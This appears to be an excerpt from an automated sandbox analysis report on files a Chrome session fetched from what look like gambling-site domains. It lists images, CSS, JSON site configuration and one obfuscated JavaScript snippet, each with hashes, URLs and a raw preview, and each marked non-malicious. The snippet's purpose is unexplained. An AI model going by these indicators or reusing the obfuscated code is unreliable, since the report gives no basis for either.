                                                                                                                                                          Preview:.PNG........IHDR.......x.....,e.]....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:9CA5A6357B7A11E899F4AB816A955158" xmpMM:DocumentID="xmp.did:9CA5A6367B7A11E899F4AB816A955158"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9CA5A6337B7A11E899F4AB816A955158" stRef:documentID="xmp.did:9CA5A6347B7A11E899F4AB816A955158"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.B.....7IDATx.L.W.e.y........7..A... .A..!....!...]...v..nt#....B...9$5..!@.0.......LV....v..[..I.Dw.pN......}..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2452), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2452
                                                                                                                                                          Entropy (8bit):5.870477733777
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:V/iW9pKLUsj3gWSGCjE8kmBpEN5MfnbSUve3BybQ+2avg7v/BrDnaD74ruAVpFd2:VKmKVzgWBrXNLMfujMQTv/BrlrucJ2
                                                                                                                                                          MD5:7DE2B77EFF9ABCE0D365ECC344BD2C9E
                                                                                                                                                          SHA1:7D908EE4FD74DA507E15C11F025D544592193302
                                                                                                                                                          SHA-256:87212B39B63CDBE1FE34D184A7F6800688AC759CE38E1D7D0D36EFFD8E8B000D
                                                                                                                                                          SHA-512:4E644C31D560134EB235E3B1C5983D6BD31F622F572B16A2DD05D2034FEBE7301ED4A28EA3464EF7BBF20326824B768DFAEA07FCB9339676F10E813E9728E15E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/382/logo.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjABnwHYBdAGgG8AVMAEwDYAuAMwFc0YAXAS3U07IgAlBQC+ZTvhot2XXmn6CyUEQCJWSEAAIknAE7cuqgNwB5MACsQXAHS0QzbmhAAFPSggg9nAJ6YQZKoA+kEgSACyKLSsADYgqpQAblAxrCCMAIT4okLGyXpaKAC8UJiq+DAQzKpCZEglZfjcLgAWNWQxJTYKSLXcDaoA9IkA4gAs7XpdCty1aEUUaFAAtumqMSgA5igJMCjLEOggaJxIjBTcy1CbIAAyKFD2ejIcPHwieiCcrHpoWlA2ECYXAAZhBYyENk4LWOmABYCctEwaFiMUCmzSABEakJROJaFBOFAXnJ3hRPt9fhQYLQ0C5CS1GCg7A4oLFODYAMLoXRQE42GloAASKF0ZEFIt0TJZzDZMQ53LQvP5rAgG0ekoEcBAPjO+A6WxQ53ESBaKGAAGUAOoAMUyuDqwGYQr5tE5MSgAC9PedgNxaNDGKoEjDuJsWpwg6o8eIYJ9CSBaCS3goRPktJwitDuEhBEU/WhaOabBaANIASQAcsZSqpcABBCybGplGyDVQAahAHaGiJAAA8bBYkDUoTCFGxXvJ/GmoAUoEUQDYYY8vDYNts6kU9DYATdOGUNyh6dCasYOQASZz9zhUQxwTCT0mpigco8lCQ2U3m602opBQFCyQK1uGhOEbEuTYLT0GBAi/J12g5b9LVtAAyVD+HXQ0IOWKCYKzAVaRPFoe0GS5rhAABaCAYEGI92w7N9sMg6CYFqDIkLNFCbXQpB0Mwo8v18OJsFUMBYDgTZ3HYWhKPIm5VBIIp1D0GIyg7TAkAAfmZexZXZLkeSJFU1QeWhNQ7M5eyuG5qNo+ivHcHcIDQZshB7IQEiY7Yv3w3pPyQJ0XULd0vU9BY/QDRkAV0Hw4hsSLoTIUNw0jGLhKXFKI3EXTWQM+sIG4C0vESQwl33e5tkwSFoVhJ8UxnC
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):462291
                                                                                                                                                          Entropy (8bit):5.360146760221464
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:RUUEuK5a8lZkP6QUT63i6PSNh/TR1Ez0l:RpP6QUT63i6PSNhLR1Fl
                                                                                                                                                          MD5:B28ABFD6764097C9D1A2BB5740A6C937
                                                                                                                                                          SHA1:1DE542F7356A3203C12932D7A8045C8C0629249A
                                                                                                                                                          SHA-256:4DADC80D4502837A980709A73252DA7CA0F8A3C7EAB6191E13FD978C496C72AD
                                                                                                                                                          SHA-512:C72171D95C96EEF3D1FC71370DF676821CEA51BE4D029076729B55F9FA29D5B3F7A62F7889F4E8140FF113745FD8D26600DD336DAFC71D711EBA425788F21D72
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Preview:.tutorial-body[data-v-e9757988]{min-width:1000px;background:#201b15 url(/pc/image-pc/tutorial/big-bg.jpg) no-repeat bottom;background-size:cover}.tutorial-body [data-v-e9757988],.tutorial-body [data-v-e9757988]:after,.tutorial-body [data-v-e9757988]:before{box-sizing:content-box}.tutorial-body .add-members[data-v-e9757988],.tutorial-body .home[data-v-e9757988]{position:absolute;right:13px;top:50%;transform:translateY(-50%)}.tutorial-body .add-members.home[data-v-e9757988],.tutorial-body .home.home[data-v-e9757988]{right:17px}.tutorial-top[data-v-e9757988]{background:url(/pc/image-pc/tutorial/tutorial-bg.jpg) repeat-x 0 0;height:100px;width:100%;padding:15px 0;border-bottom:3px solid #007989}.tutorial-title[data-v-e9757988]{height:1px;background:#4d4d4d;width:342px;margin:30px auto 0;text-align:center}.tutorial-title h1[data-v-e9757988]{color:#faf4e0;font-size:24px;position:relative;top:-15px;background:#272727;width:154px;margin:0 auto;font-weight:900}.tutorial-main[data-v-e9757988]{wi
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1659
                                                                                                                                                          Entropy (8bit):7.21678675604562
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:Oy1he91Wwjx82lY2T3ouVMgznyJ3VMrMzJYGenRz+WTmklpXGSqL4sz2T7P3ebzV:OwqQNn2xSJ3YN3Rz+omklp2n0fYV17F
                                                                                                                                                          MD5:378F8D7680E55A958726FEC3488AA7D8
                                                                                                                                                          SHA1:28811EC669AC6CF0581E83056BFC811C3B178708
                                                                                                                                                          SHA-256:A34779FB61A9C659F8F898396E1F5D116D5B3D50A7FB3065A7D8CDDEB523968E
                                                                                                                                                          SHA-512:ED33A0B658FA2AC7B102099C7CADE81DF5ED437DAB6F9A4E5D7365C75ACFFBB280337EC066543FC692CE2CAB0DD7A0E6A1DFD6CE988362235911C6B5CA7499C8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/sport_saba_w.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:7671E35BC41411EA99C6B9D0D2C221B1" xmpMM:DocumentID="xmp.did:7671E35CC41411EA99C6B9D0D2C221B1"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7671E359C41411EA99C6B9D0D2C221B1" stRef:documentID="xmp.did:7671E35AC41411EA99C6B9D0D2C221B1"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..d.....IDATx...KHTQ...*...(.B.G...D....A..T..YQP..M;.7-.v.(1..(.^Pd.1R..iiRD..V..>......bsg.r...9....{..s.8.`.7.%.7
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 265 x 110, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):15757
                                                                                                                                                          Entropy (8bit):7.964881954519443
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:h4MHMqUD0jOg8SsB50o13VPNjH6ioN7t2irCBNoB7KItcMEey3QR:GWMqUgjOgJoDFjH6ioX2i+7O7KVc
                                                                                                                                                          MD5:435E046CC9112E43E3DBDDF426F2CD82
                                                                                                                                                          SHA1:E88476D7BA32F08C52A9E562FEEB54B2F690CCEC
                                                                                                                                                          SHA-256:7DCB5D26203CDB79EAA728C541D517CA5B38A4FF02D85F194ABB7748BE5331F5
                                                                                                                                                          SHA-512:22BCA2ABA0CEECB2BB3B9B9EED9366AAE539079655EE950DA6054870EE1D7949982225D4C0AAD03361FA033BC4B44336E94C215A8508DE87A9F1803C85A849F5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/125/games/games_2.png
                                                                                                                                                          Preview:.PNG........IHDR.......n.....4..2....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:be457105-edda-43c1-9a4d-c1ff99739311" xmpMM:DocumentID="xmp.did:AABF25731E2F11EEA737E951EC38508F" xmpMM:InstanceID="xmp.iid:AABF25721E2F11EEA737E951EC38508F" xmp:CreatorTool="Adobe Photoshop 24.6 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:026c682c-b3d0-4931-b351-6b8907d1b640" stRef:documentID="adobe:docid:photoshop:096fc112-9f25-0440-9ad2-449113380a26"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.d...9.IDATx..}....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 18388
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4084
                                                                                                                                                          Entropy (8bit):7.94569233466241
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:mwcWOzIzqP0Drv6oQckG8NF/xiWqpvCkxpR:RwIzXscRqRxiWkTpR
                                                                                                                                                          MD5:106BA6DD5A7918BDB0DD73A4594C5684
                                                                                                                                                          SHA1:5DA4B04A3D47B087CDC723C63606CCD53D61C52F
                                                                                                                                                          SHA-256:4BE1B19DD11804094ACA2A4C9E62C22AFD21B14EAFFCA0874E87A3441BE04966
                                                                                                                                                          SHA-512:1B1589144CCB52B8F53C0D6862E626808F70748B3F4E3DCB950F985A8C2200E7CE7FAD056AC6645FAD84063178DC517FAAAC7ADC2EF18BA20D19666C8CA3833E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:...........WKo.6.>o~E.^c.....E.=t...........E.....z.R..zk` ...7.of......J..=..*E.r].=t..(..R..o.b.m.%.N.....&=|8.C/.I ....N.....P......_.o....7._P..N...=........=......$..*..jc...^..........._.>....f..s...u).}".H......t}:].YO^+.C..K?=....p.CD=._......%.{.Y'Y(.4..'..K...aV..]!6....Y!.*.e.EY.K./(.-h.t.._.\.f....C..=..K.~rV6......i..h.x~.{2U.G.....T..n..j.~.^:........s..U`N]}j1.T%....)7.u.6G..y8.....@.H..zz|...y"...DZTJ.}.'d.I......eQ.~..X*..Q.>.NO...avi......gA.V.O.\...O...."K<..%........,....w.V&...gA.k..L.K....!3....y..Y.WG...d;l0...go_.HxU.......b.|..(.f^.JE....=w<..i...q~%.<..G}.r..3..U.e)..;...DX.-.r.g.3....aKB.I..Xhy.R.b......W.......K....:p......y8.a...%`..n..E`e..JyA..R`lwK...........,....u=.l..>f. .~....._....z...7.Nwow..s..S..s....,..m....{+<h.....v/.'.%a...dd....Z.Pq..0.`~Cg.wx:.".-@0.I>..a.S.A.PLL.s.....309......)..:......s.X.D....w#h.[m.m.y....0.% .Iv.a+..D.. ..N....S../.BM..........gd..2.s.5..v..lg.c.;.....v..`...;.1_..C...2..0
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-301.shiwanxin.com:1186/ocs/cc.png?1717972886700
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2022:11:18 23:56:06], baseline, precision 8, 334x81, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):46771
                                                                                                                                                          Entropy (8bit):7.575033837509303
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:9vYynIPzYynhsJYyd1W3yXpfC+S+moyR5QNGcIU3hSom:lm1sJPtx3moyRSXI4hTm
                                                                                                                                                          MD5:22487EAF7B1F24218D98CB5EF9460884
                                                                                                                                                          SHA1:529652EBE1A624A967F3539445EF3C79ECE66A96
                                                                                                                                                          SHA-256:F1DCAF3509EFF7A7983F4263868D00B2F93B9B65CE8ED9EFB38E636EE4019B2B
                                                                                                                                                          SHA-512:FCD4C8497037855A84872AA69C930E8BA9F27D55E8B813C2AB9273D8A42A4A2E84756E7FEB1C8F5143F99CEB14FF7E5D0D0537B89DD9988E3E17F9FF1ABCEC75
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://www.image110.com/uploads/99c81df9877d0dafd4d7975b0032f698.jpg
                                                                                                                                                          Preview:......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop CS6 (Windows).2022:11:18 23:56:06..........................N...........Q...........................................&.(.........................................H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2715
                                                                                                                                                          Entropy (8bit):5.371080087845529
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:Yv1FLJxwewo9BZ8/ZxD9Hk4026jz6PB8z76q5HdKgMfWoLgXcC:GjDcoNKJE40OaddrYlUcC
                                                                                                                                                          MD5:A5FDC96FE7255CAA1C6BDB860D7CDDAE
                                                                                                                                                          SHA1:358CE4C485FB4C6BE8B26F494D04A177DAE59C02
                                                                                                                                                          SHA-256:7D6D524EAD3FA8E8B02B03D8E5DA8DBCA6FACA80CD7489162ED431EE26B2E32B
                                                                                                                                                          SHA-512:7BACB845BE60F4569000A073826E9F762050F6F21449ABFB76565FBA868B84EAD99FD0F2DE1C329497D8A6D6E1523032CEC5F61BD5D0D15423E7D7214416B299
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:{"analyticsCode":"(function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true; j.charset = 'UTF-8'; j.src = 'https://static.meiqia.com/widget/loader.js'; s.parentNode.insertBefore(j, s); })(window, document, 'script', '_MEIQIA'); _MEIQIA('entId', 'c0f51ba154f1c0d141fccf42aa8b5791');","domainType":1,"agentCode":"101327476023","snType":1,"iconRel":null,"paymentType":1,"h5AppLayerFlag":1,"zone":"","sn":"ll12","firstPageFlag":1,"forwardUrl":null,"isZone":false,"settings":{"videoProfitDayThreshold":300000,"agentBalanceControlFlat":0,"openUserFeeFlat":1,"openUserPointFlat":0,"lotteryProfitDayThreshold":"1000000","autoDrawAmount":500000,"openAutoDrawFlat":2,"regCaptchaType":"normal","captchaType":"normal","vipShowFlag":0,"smsLoginFlag":0,"thirdpartyTransferOutLowerThreshold":0,"userAccountLe
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4975
                                                                                                                                                          Entropy (8bit):7.857704680690562
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:dF5IhQA1MnPQ9GBWdKqeiVKHMJkP1U2UbBJuET5b1VDkH9Fv:G1YSVcpUbjT5BRkdFv
                                                                                                                                                          MD5:692908678ABE41B359A556B5EACBEAB0
                                                                                                                                                          SHA1:4004F1ECEA6DDB603E4E706C89F4426A8C10ADD6
                                                                                                                                                          SHA-256:E74332A3C8A6E0E9839AA1350A2093A2EE850F1D9F1844D58DEDC6B13A986A4A
                                                                                                                                                          SHA-512:396567182016501BE6F0F10F0C31290574E9DCCE55021FC7117408EE74F87BA46EF7E0491703EC752F4A637898A9CD9D851EA27E5F36B61DC6B8ECC456F5F0F0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...<...<.....:..r....tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8" xmpMM:DocumentID="xmp.did:64E8B6CB89F011EAAA3187E8B31DCDC2" xmpMM:InstanceID="xmp.iid:64E8B6CA89F011EAAA3187E8B31DCDC2" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:44a76a31-a741-df47-be85-17dd3e48eedf" stRef:documentID="xmp.did:dc7bb777-32f7-c247-8a71-326368638fe8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>^......IDATx..[{.\W}..}.s........I
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2174
                                                                                                                                                          Entropy (8bit):7.384908592342893
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:LfvnLjICpccCeJ38q/f6t4ec5j1YF3TyF2X6rJeKuOeG7PKST2:7tp1C0e43SFVAeKDj+
                                                                                                                                                          MD5:D8F694E3F0C0988664245B10D5A27AEB
                                                                                                                                                          SHA1:ED357D33EF0912FB5812383A16B17FEA4CCE97DC
                                                                                                                                                          SHA-256:8BDF7D513B271DFDA54C8D1A197ED4F24C6755FE6642116FA004A1F4503BA655
                                                                                                                                                          SHA-512:21EA128A949D838AD3563C0DFC66F950355A4F782C4B9CDF25CF03BB29A894786E036AE86C096994C73E761F85E5A1DA168D1E7F427FA22886479917FDC66391
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/card_more.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:ea94d59f-af8e-3b40-82cf-f343901f80d7" xmpMM:DocumentID="xmp.did:52DC3AEA8A0411EA80BBD3E09B2B2EBA" xmpMM:InstanceID="xmp.iid:52DC3AE98A0411EA80BBD3E09B2B2EBA" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5bbece77-91f8-1d4c-bfc4-7cd89f8eb907" stRef:documentID="xmp.did:ea94d59f-af8e-3b40-82cf-f343901f80d7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...f....IDATx.WkL[e.~.B.-.....M.7t
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1123
                                                                                                                                                          Entropy (8bit):5.493713337336767
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:YvZLFLJxw8R5RWorwilPEIuhF7i+xRH9/pHBLgIugTIRgeRB/Krfjj:Yv1FLJxwewo9BGNhLgPNgsKz
                                                                                                                                                          MD5:D01102906EF6E32E787C27616CA415E3
                                                                                                                                                          SHA1:A5B7E8CEBC290634EAE62FAADB5FEBD98C85F085
                                                                                                                                                          SHA-256:7D79BCB4E392A105BB7031DCB3BC6FB4EC802B2B235326B66911C150EDC99E23
                                                                                                                                                          SHA-512:97E0997BCFFAD961ADB1407F3B8A78CBD1623E904F7A3F47ACFADB1B98C1ED9D4F7F6163E1FA442491615059C53C067227EF16D338CDD8A5382CC218D4AC65AA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ahd-ocssn.qqxgo.com/zb-cloud/stat.do?pv=ajax&pa=host.info&domain=hg679.cc&terminal=1&r=6412591773
                                                                                                                                                          Preview:{"analyticsCode":"(function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true; j.charset = 'UTF-8'; j.src = 'https://static.meiqia.com/widget/loader.js'; s.parentNode.insertBefore(j, s); })(window, document, 'script', '_MEIQIA'); _MEIQIA('entId', 'c0f51ba154f1c0d141fccf42aa8b5791');","domainType":1,"snType":1,"agentCode":"","paymentType":1,"h5AppLayerFlag":1,"zone":"","sn":"ll12","firstPageFlag":1,"forwardUrl":null,"isZone":false,"settings":{},"httpsEnabled":0,"loginBg":null,"webPath":"t4091","httpsSupport":0,"analyticsJs":"","loginLogo":null,"name":".......","onlineCustomerServiceUrl":"https://hg2.jxxh8.icu/chatlink.html","preventPageFlag":1,"currencyCode":"CNY","icon":"/fileupload/ll12/202312/202312180557505.png","snStatus":1,"webTitle":"....","isMaintain":0,"i
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2747
                                                                                                                                                          Entropy (8bit):5.373572542949478
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:Yv1FLJxwewo9BI9R8/ZxD9Hk4026jz6PB8z76q5HdKgMfWhLgPRc8h:GjDcoMLKJE40OaddrYK2c8h
                                                                                                                                                          MD5:5C014C791C3C871978A5E9D12E14EB46
                                                                                                                                                          SHA1:A1D227AC8478F66AF9951EF39E13D375F99A3314
                                                                                                                                                          SHA-256:A53CEA0DD1D8D5BFA8DC211FFD0CF7CC949EF8A8E940169D0B54F7F5CAC81E0A
                                                                                                                                                          SHA-512:7672C842373E417A8E995DB2DF9B683979BF9CA09720AE2ED9B148EB0021DE9866D9758742BBC0340B1A551194ACB27B5D2BC1A7B5CB00E5BBD6ED1EAE35DCEE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi-aka.blackkhaki918.com/lt-cloud/stat.do?pv=ajax&pa=host.info&domain=hg679.cc&withAgentCode=1&withSettings=1&terminal=1&ts=17972844545290
